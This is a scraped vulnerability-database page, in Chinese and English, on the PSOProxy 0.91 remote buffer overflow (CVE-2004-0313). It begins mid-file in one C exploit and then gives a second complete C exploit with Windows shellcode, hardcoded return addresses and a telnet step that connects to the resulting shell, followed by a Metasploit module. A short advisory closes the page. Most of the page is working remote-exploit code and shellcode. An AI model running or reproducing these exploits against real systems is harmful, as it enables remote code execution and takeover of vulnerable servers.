                          fprintf(stderr,"\t%i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
                          exit(1);
                  }
                  ret = exp_os[atoi(optarg)].ret;
                  break;
              case '?':
                  fprintf(stderr,"[-] option \'%c\' unknown\n",optopt);
                  die(argv[0]);
          }

      fd = set_connection(host,port);
      strncpy(buffer,build(ret),SIZE-1);
      buffer[SIZE-1] = '\0';
      send_evil(fd,buffer);
      back_connection(host);
      return 0;
}

char
*build(long ret)
{
      char *buffer,*ptr,*request;
      int i;
      long *addr_ptr;

      fprintf(stdout,"[+] Building evil string to send (0x%x).\n",ret);
      buffer = (char *)malloc(SIZE);
      request = (char *)malloc(SIZE+4);

      if(!buffer || !request)
      {
          fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
          exit(0);
      }

      ptr = buffer;
      memset(ptr,0x41,1024);
      ptr += 1024;

      addr_ptr = (long *)ptr;
      *(addr_ptr++) = ret;
      ptr = (char *)addr_ptr;

      memset(ptr,0x90,20);
      ptr += 20;
      memcpy(ptr,shellcode,strlen(shellcode));
      ptr += strlen(shellcode);

      snprintf(request,SIZE+64,"%s\r\n",buffer);
      return request;
}


int
back_connection(long host)
{
      struct sockaddr_in s;
      u_char sock_buf[4096];
      fd_set fds;
      int fd,size;
      char *command="ver\n";

      fd = socket(AF_INET, SOCK_STREAM, 0);
      if (fd < 0)
      {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          exit(0);
      }

      s.sin_family = AF_INET;
      s.sin_port   = htons(BACK);
      s.sin_addr.s_addr = host;

      if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)
      {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd);
          return 0;
      }

      fprintf(stdout, "[+] Here's your shell, have fun!\n\n");

      size = send(fd, command, strlen(command), 0);
      if(size < 0)
      {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd);
          exit(0);
      }

      for (;;)
      {
          FD_ZERO(&fds);
          FD_SET(0, &fds);
          FD_SET(fd, &fds);

          if (select(255, &fds, NULL, NULL, NULL) == -1)
          {
              fprintf(stderr,"[-] %s\n",strerror(errno));
              close(fd);
              exit(0);
          }

          memset(sock_buf, 0, sizeof(sock_buf));

          if (FD_ISSET(fd, &fds))
          {
              if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
              {
                  fprintf(stderr, "[-] Connection closed by remote host.\n");
                  close(fd);
                  exit(0);
              }

              fprintf(stderr, "%s", sock_buf);
          }

          if (FD_ISSET(0, &fds))
          {
              read(0, sock_buf, sizeof(sock_buf));
              write(fd, sock_buf, strlen(sock_buf));
          }
      }
      return 0;
}

void
send_evil(int fd,char evil[SIZE+64])
{
      int size;
      size = send(fd, evil, strlen(evil), 0);
      if(size < 0)
      {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd);
          exit(0);
      }
      sleep(1);
      return;
}


int
set_connection(long host,int port)
{
      struct sockaddr_in s;
      struct hostent * hoste;
      int fd,size;

      fd = socket(AF_INET,SOCK_STREAM,0);
      if(fd < 0)
      {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          exit(0);
      }

      s.sin_family = AF_INET;
      s.sin_addr.s_addr = host;
      s.sin_port = htons(port);

      if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)
      {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd);
          exit(0);
      }

      fprintf(stdout,"[+] Connected to %s:%i.\n",inet_ntoa(s.sin_addr.s_addr),port);

      sleep(1);
      return fd;

}

long resolve_host(u_char *host_name)
{
      struct in_addr addr;
      struct hostent *host_ent;

      addr.s_addr = inet_addr(host_name);
      if (addr.s_addr == -1)
      {
          host_ent = gethostbyname(host_name);
          if (!host_ent) return(0);
          memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
      }

      return(addr.s_addr);
}

void
die(char *argv)
{
      int i;
      fprintf(stdout,"usage: %s -h <victim> -p <port> -t <target>\n",argv);
      fprintf(stderr,"Platforms supported are:\n");
      for(i=0; exp_os[i].plat != NULL; i++)
          fprintf(stderr,"\t%i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
      exit(1);
}

/* A poil! */

		

- 漏洞信息 (23734)

PSOProxy 0.91 Remote Buffer Overflow Vulnerability (3) (EDBID:23734)
windows remote
2004-02-20 Verified
0 NoRpiuS
N/A [点击下载]
source: http://www.securityfocus.com/bid/9706/info
  
It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.
  
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. 

/*******************************************************
*  PSO v0.91 Remote exploit                            *
*  by NoRpiUs                                          *
*                                                      *
*  web: www.norpius.tk                                 *
*  email: norpius@altervista.org                       *
*                                                      *
*******************************************************/ 

#include <stdio.h>
#ifdef WIN32
    #include <winsock.h>
    #include <windows.h>
    #define close closesocket
#else
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif

unsigned char shellcode[] = 

  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  "\x83\xc4\x5c\x61\xeb\x89\x41\r\n";


void errore( char *err )
{
	printf("%s",err);
	exit(1);
}

void connectz( char *host)
{
	char comando[30000];
	sleep(5000);
	sprintf(comando, "telnet %s 28876", host);
	system(comando);
}

void banner(void)
{
	fputs("\n\tPSO Remote exploit\n"
	      "\tBy NoRpiUs\n"
	      "\tweb: www.norpius.tk\n"
	      "\temail: norpius@altervista.org\n\n", stdout);
}

void uso( char *progz )
{	
	printf("Uso: <host> <porta> <target>\n\n");
	printf("\tTarget:             \n"
               "\t1 = Win2k ITA SP4   \n"
               "\t2 = WinXP ITA SP0(1)\n"
               "\t3 = WinXP ITA SP0(2)\n");
	exit(1);
}

int main( int argc, char *argv[] )
{
	int sock;
	struct hostent *he;
	struct sockaddr_in target;
	unsigned char evilbuff[1530];
	long retaddr1 = 0x796C7DDC;   
        long retaddr2 = 0x77E7FC79; 
        long retaddr3 = 0x77EB1933;    

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif

	banner();
	if ( argc < 4 ) uso(argv[0]);

	if ( (he = gethostbyname(argv[1])) == NULL )
		errore("\t[-] Impossibile risolvere l'host\n");

	target.sin_family = AF_INET;
	target.sin_addr   = *(( struct in_addr *) he -> h_addr );
	target.sin_port   = htons(atoi(argv[2]));

	fputs("\t[+] Preparazione del buffer...\n", stdout);

	memset(evilbuff, 0x41, 1040 );
	
        switch(argv[3][0]) 
        {
                case '1': memcpy(evilbuff + 1024, (unsigned char *) &retaddr1, 4); break;
                case '2': memcpy(evilbuff + 1024, (unsigned char *) &retaddr2, 4); break;
                case '3': memcpy(evilbuff + 1024, (unsigned char *) &retaddr3, 4); break;
                default : errore("[-] Target sbagliato\n");                       
        }
	
	memcpy(evilbuff + 1040, shellcode, sizeof(shellcode)); 
	
	fputs("\t[+] Connessione...\n", stdout);

	if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0 )
		errore("\t[-] Impossibile creare socket\n");

	if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
		errore("\t[-] Connessione fallita\n");

	if ( send( sock, evilbuff, sizeof(evilbuff), 0) < 0 )
		errore("\t[-] Impossibile spedire il buffer\n");

	close(sock);

	fputs("\t[+] Buffer spedito!\n", stdout);
	fputs("\t[+] In attesa della connessione...\n\n", stdout);

	connectz(argv[1]);

	return(0);

}

	
	
		

- 漏洞信息 (F83235)

PSO Proxy v0.91 Stack Overflow (PacketStormID:F83235)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit,web,overflow
CVE-2004-0313
[点击下载]

This Metasploit module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PSO Proxy v0.91 Stack Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
				If a client sends an excessively long string the stack is overwritten.
			},
			'Author'         => 'Patrick Webster <patrick@aushack.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0313' ],
					[ 'OSVDB', '4028' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
					[ 'BID', '9706' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 20 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(8080),
			], self.class)
	end

		def autofilter
                false
        end

		def check
			connect
			sock.put("GET / HTTP/1.0\r\n\r\n")
			banner = sock.get(-1,3)
			if (banner =~ /PSO Proxy 0\.9/)
				return Exploit::CheckCode::Vulnerable
			end
			return Exploit::CheckCode::Safe
		end

		def exploit
			connect

			exploit = rand_text_alphanumeric(1024, payload_badchars)
			exploit += [target['Ret']].pack('V') + payload.encoded

			sock.put(exploit + "\r\n\r\n")

			disconnect
			handler
		end
	end
    

- 漏洞信息

4028
PSOProxy Long HTTP Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

A remote overflow exists in PSOProxy. The program fails to handle long HTTP GET or method name requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code.

- 时间线

2004-02-20 Unknow
2004-02-20 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PSOProxy Remote Buffer Overflow Vulnerability
Boundary Condition Error 9706
Yes No
2004-02-20 12:00:00 2009-07-12 03:06:00
Disclosure of this issue is credited to "Donato Ferrante" <fdonato@autistici.org>.

- 受影响的程序版本

PSOProxy PSOProxy Server 0.91

- 漏洞讨论

It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.

A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server.

- 漏洞利用

The following proof of concept exploit has been supplied:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站